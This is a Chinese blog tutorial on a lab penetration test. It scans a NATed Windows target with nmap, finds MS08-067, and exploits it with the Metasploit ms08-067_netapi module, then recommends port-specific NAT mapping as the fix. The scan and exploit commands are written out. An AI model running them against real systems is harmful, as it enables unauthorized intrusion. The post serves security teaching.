外网渗透(详细原理)

于 2024-07-12 21:16:15 发布
阅读量624 收藏 2
点赞数 14
分类专栏: Metasploit Framework 网络安全 nmap 文章标签: 网络安全 网络攻击模型 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65891791/article/details/140380795
版权

外网渗透

1. 搭建环境

1.1 实验拓扑

在这里插入图片描述

1.2 目标

使用外部的kali(192.168.168.137)作为攻击方,攻击内网的靶子机(192.168.100.3)

2. 渗透主机

2.1 扫描主机

外网访问内网在路由器上做了静态nat,用kali扫描靶子机映射在外网的ip地址192.168.168.151

nmap -sC --script=vuln 192.168.168.151

在这里插入图片描述
在这里插入图片描述
可以发现存在ms08-067号漏洞

2.2 渗透主机

使用Metasploit Framework工具寻找攻击工具

search ms08-067

在这里插入图片描述
使用攻击工具并设置攻击参数

use exploit/windows/smb/ms08-067_netapi
show options
set rhost 192.168.168.151

在这里插入图片描述
启动攻击工具

run

在这里插入图片描述
进入这个界面就已经攻击成功了,可以直接查看靶子机的ip地址
在这里插入图片描述

3. 小结

静态nat放开全部端口是不安全的,当我们需要用到什么服务时我们最好只打开这些服务的端口。如果我们将静态nat设置详细到端口,可以发现无法攻击成功了,这是因为我们利用的漏洞是smb服务端口号是445,而现在445号端口没有加入静态nat的映射中

ip nat inside source static tcp 192.168.100.3 80 interface g0/1 80

在这里插入图片描述
修改之后可以发现我们无法再利用这个漏洞进行攻击了

柠檬加醋如我心酸
关注
专栏目录
渗透资源】 内网渗透指南
03-03
这样的攻击可以分为两大思路:一种是通过攻击外网服务器作为跳板,进而渗透内网获取敏感数据;另一种是直接攻击办公网的系统和设备,通过社会工程学等手段控制电脑,获取登录账号和密码等信息,以此来获取内网或生产...
外网渗透端口服务
@小张小张的博客
09-12 1455
外网渗透,各个端口的利用: 80端口(Apache服务——http) 原理 查看扫描到的目录,发现漏洞,进而获取shell等信息; 实验过程 2.1> 发现目标开启apache服务,在网页中可以尝试web渗透(爆破、sql注入、xss、csrf等) 2.2> 网站指纹信息扫描(whatweb) 2.3> 目录扫描(dirb) > dirb http://192.168.1.X 2.4> 查看扫描到的网站目录 2.4.1> 打开目标主机的php配置文件 ht
外网渗透
weixin_46928280的博客
08-24 913
web渗透的一般流程,以及常见工具的使用,以及简单提权方式
渗透实战 | 从外网直接打到内网全过程
最新发布
weixin_51725318的博客
02-21 2351
渗透实战 | 从外网直接打到内网全过程
渗透测试实战 - 外网渗透内网穿透(超详细
HAKUNAMATATATTA的博客
02-18 8146
渗透测试实验,外网渗透和内网穿透的详细操作过程以及内网代理和内网探测的方法
超牛叉的外网渗透详细教程
cheyunhua的博客
03-22 6263
文章来源 简书 https://mp.weixin.qq.com/s/oGUDJxPOfCz2CW-mCeeAlQ(原文) 众所周知,Metasploit 是个内网渗透神器。 但是内网渗透哪有外网刺激,于是笔者上度娘搜索“msf 外网”。 搜索结果的话, 首先,虚拟机里的kali不能渗透外网的原因是它没有外网IP。 所以大多数都是用内网穿透工具,还有一部分是通过服务器做个frp代理。 本质其实都一样。但是亲测后者比较有用。 可!是! 第二个方法有一个特点,就是很烦。 买好服务器之后再下载frp,服务器
网络安全知识体系】外网渗透测试 | 14个小实验
04-18 1万+
【通俗易懂】外网渗透测试的流程&14个小实验带你了解网络安全
Kali使用Metasploit内、外网渗透windows系统
热门推荐
QQ670663的博客
02-17 2万+
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。 一、(内网渗透)内网英文缩写WAN;内网又称局域网 局域网的覆盖范围一般是方圆几千米之内,其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。局域网可以实现文件管理、应用软件共享、打印机共享等功能,在使用过程当中,通过维护局域网网...
渗透系列:外网渗透内网穿透(超详细
weixin_54626591的博客
12-07 945
外网渗透内网穿透(超详细
vulnstack4渗透-外网
weixin_51441054的博客
04-20 3130
环境搭建 靶机:ubuntu:ubuntu(web服务器 网卡1:192.168.142.139(模拟外网) 网卡2:192.168.183.130(内网)) 域成员机器:douser:Dotest123(192.168.183.128)win7 DC:administrator:admin123,.(192.168.183.130)windowsserver2008 kali攻击机:192.168.142.134(模拟外网) 先对web靶机进行信息收集 发现一个ssh服...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
完成渗透测试后,应生成详细的报告,列出发现的问题和建议的解决方案。同时,为了维护合法性和道德性,必须确保在测试结束后清理所有痕迹,关闭任何打开的连接,并恢复系统到原始状态。 7. **学习与进阶** 学习...
常考渗透测试面试题.pdf
09-29
* SSRF漏洞:攻击者可以通过构造恶意请求,访问服务器内网或外网资源,导致敏感数据泄露或权限提升。 * XML注入漏洞:攻击者可以通过inject恶意XML代码,获取敏感数据或控制系统。 * 逻辑漏洞:攻击者可以通过...
计网大作业-Kali制作调用网站-详细
05-30
Kali Linux作为一个专门针对网络安全渗透测试的操作系统,内置了大量的工具,包括用于制作钓鱼网站的工具。在制作钓鱼网站的过程中,Kali Linux提供了以下步骤: 1. **安装Kali Linux**:首先,需要从官方网站...
cisp-pte渗透测试资源下载 ,包括 考试环境、题目
08-05
压缩包中的“cisp-pte渗透测试资源下载,包括考试环境、题目.txt”文件很可能是模拟试题或者练习环境的详细说明,可能包含具体任务、目标系统信息和评分标准等内容。考生可以通过这些资源来模拟真实的渗透测试场景,...
网络安全中什么是内网渗透外网渗透?
oldboyedu1的博客
12-13 690
4、攻击目标:在互联网攻击的时候,侧重于拿到权限、拿到数据、找到漏洞,而进入内网以后,对集权设备的打击更为重要,当然如果没有找到集权设备,也可以一步一步向着攻击目标前进。3、信息量:如果你是通过互联网攻击边界服务器,进而拓展内网的,此时可以通过边界服务器上的信息收集,从而掌握很多更精确的信息,在内网中更快取得成果。2、脆弱性:内网资产相对薄弱,因为内网在隔离之内,只对内部用户开放,相对来说安全措施就做的少了很多,进入内网之后,可能会遇到各种基础的安全漏洞。
零基础该如何学渗透测试,从0到1
z099164的博客
04-24 436
渗透测试:指的是试图利用系统、网络、人力资源或实物资产中的弱点或漏洞,以对安全控制的有效性进行压力测试。渗透测试不同类型包括:网络服务、应用程序、客户端、无线、社会工程和物理。可以在外网或内网,执行渗透测试,以模拟不同的攻击向量。
msf手机渗透二(实现外网渗透
weixin_63204687的博客
11-07 3231
在内网穿透官网注册飞鸽内网穿透开通隧道,然后本地端口与公网端口绑定,这样访问公网的所有请求最后都会传入本地端口。在本地生成apk的时候使用公网IP和对应Port而对其进行监听的时候设置本地IP和port。这样app在别人手机上被点击以后会直接链接公网对应IP端口,因为公网的已经和本地的绑定了,并且在电脑监听的时候监听的是本地端口,所以最后链接返回给本地电脑。使用公网开通隧道本质上是一个桥梁作用,连接了不同局域网之间的通信。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值